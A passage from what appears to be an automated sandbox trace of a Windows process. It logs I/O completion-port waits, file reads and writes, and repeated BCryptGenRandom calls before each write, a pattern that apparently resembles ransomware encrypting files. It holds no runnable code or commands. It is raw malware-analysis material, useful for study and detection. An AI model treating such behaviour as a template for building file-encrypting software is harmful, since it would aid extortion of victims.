dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.679] CloseHandle (hObject=0x338) returned 1 [0176.680] free (_Block=0x1ff1e60) [0176.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.681] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x578, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0176.681] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.681] CloseHandle (hObject=0x3cc) returned 1 [0176.682] free (_Block=0x3df0008) [0176.682] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0177.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0177.020] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.020] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.020] free (_Block=0x3e305b8) [0177.021] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.021] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.021] free (_Block=0x1fa91d0) [0177.021] free (_Block=0x1fa2ed8) [0177.021] free (_Block=0x1fa90b8) [0177.021] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.021] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.031] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0177.031] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.031] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0177.031] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.031] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.032] free (_Block=0x3e305b8) [0177.032] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.032] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.032] free (_Block=0x1fa91d0) [0177.032] free (_Block=0x1fa2ed8) [0177.032] free (_Block=0x1fa90b8) [0177.032] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.042] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.042] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0177.042] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0177.043] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.043] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.043] free (_Block=0x3e305b8) [0177.043] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.043] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.043] free (_Block=0x1fa91d0) [0177.043] free (_Block=0x1fa2ed8) [0177.043] free (_Block=0x1fa90b8) [0177.043] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0177.044] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.053] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.053] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0177.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0177.054] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.054] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.054] free (_Block=0x3e305b8) [0177.054] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.054] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.054] free (_Block=0x1fa91d0) [0177.054] free (_Block=0x1fa2ed8) [0177.054] free (_Block=0x1fa90b8) [0177.054] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0177.055] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.061] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.062] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0177.062] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.062] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0177.063] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.063] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.063] free (_Block=0x3e305b8) [0177.063] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.063] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.063] free (_Block=0x1fa91d0) [0177.063] free (_Block=0x1fa2ed8) [0177.063] free (_Block=0x1fa90b8) [0177.063] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0177.063] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.312] CloseHandle (hObject=0x170) returned 1 [0177.313] free (_Block=0x1ff1e60) [0177.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.320] CloseHandle (hObject=0x3cc) returned 1 [0177.320] free (_Block=0x3d70450) [0177.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.328] CloseHandle (hObject=0x338) returned 1 [0177.328] free (_Block=0x3f70048) [0177.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.338] CloseHandle (hObject=0x2a4) returned 1 [0177.339] free (_Block=0x3e70008) [0177.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.371] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x5b70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0177.371] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.375] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1262e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0177.378] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.379] CloseHandle (hObject=0x338) returned 1 [0177.379] free (_Block=0x3d70450) [0177.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.381] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x574, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.382] CloseHandle (hObject=0x2a8) returned 1 [0177.382] free (_Block=0x3df0008) [0177.382] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.422] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x967a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.423] CloseHandle (hObject=0x2a8) returned 1 [0177.423] free (_Block=0x3df0008) [0177.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.431] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x22f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.431] CloseHandle (hObject=0x338) returned 1 [0177.432] free (_Block=0x1ff1e60) [0177.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.444] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x107b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.445] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.450] CloseHandle (hObject=0x338) returned 1 [0177.450] free (_Block=0x3df0008) [0177.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.459] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1a2c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.464] CloseHandle (hObject=0x2a8) returned 1 [0177.464] free (_Block=0x1ff1e60) [0177.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.473] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbd6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.475] CloseHandle (hObject=0x338) returned 1 [0177.475] free (_Block=0x3df0008) [0177.475] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.487] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa16, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.495] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x36dc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.496] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.499] CloseHandle (hObject=0x2a8) returned 1 [0177.499] free (_Block=0x1ff1e60) [0177.499] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.509] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2135, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0177.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.513] CloseHandle (hObject=0x3cc) returned 1 [0177.513] free (_Block=0x3d70450) [0177.513] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.524] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4f0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.524] CloseHandle (hObject=0x2a8) returned 1 [0177.524] free (_Block=0x1ff1e60) [0177.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.531] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1844, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0177.531] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.534] CloseHandle (hObject=0x3cc) returned 1 [0177.535] free (_Block=0x3d70450) [0177.535] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.542] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x81c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.542] CloseHandle (hObject=0x2a8) returned 1 [0177.542] free (_Block=0x1ff1e60) [0177.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.572] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x50c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.573] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.585] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x778, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0177.585] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.608] CloseHandle (hObject=0x3cc) returned 1 [0177.608] free (_Block=0x3d70450) [0177.608] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.611] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2fdc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.620] CloseHandle (hObject=0x308) returned 1 [0177.620] free (_Block=0x3f70048) [0177.620] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.627] CloseHandle (hObject=0x338) returned 1 [0177.627] free (_Block=0x3df0008) [0177.627] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0177.653] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2770, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0177.653] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 